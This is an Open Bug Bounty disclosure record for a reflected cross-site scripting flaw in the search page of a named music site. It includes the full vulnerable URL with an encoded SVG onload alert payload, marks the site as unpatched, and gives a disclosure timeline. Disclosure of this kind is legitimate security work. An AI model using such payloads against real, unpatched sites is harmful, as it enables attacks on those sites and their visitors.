songs4down.cc XSS vulnerability

2016-09-22T07:54:00
ID OBB:183014
Type openbugbounty
Reporter WhitePacket
Modified 2016-10-06T08:13:00

Description

Vulnerable URL:
http://songs4down.cc/search.php?q=%27%22%3E%3CSvG%20onload=alert(%27OPENBUGBOUNTY%27)%3Ehttp:songs4down.ccsearch.php?q=%D7%94%D7%90%D7%99+%D7%A2%D7%95%D7%A0%D7%94+1+%D7%A4%D7%A8%D7%A7+1
Details:

Description| Value
---|---
Patched:| No
Latest check for patch:| 27.07.2017
Vulnerability type:| XSS
Vulnerability status:| Publicly disclosed
Alexa Rank| 357672
VIP website status:| No
Check songs4down.cc SSL connection:| (Grade: A)

Coordinated Disclosure Timeline:

Description| Value
---|---
Vulnerability submitted via Open Bug Bounty| 22 September, 2016 07:54 GMT
Generic security notifications sent to website owner| 22 September, 2016 07:56 GMT
Vulnerability details disclosed by researcher| 6 October, 2016 08:13 GMT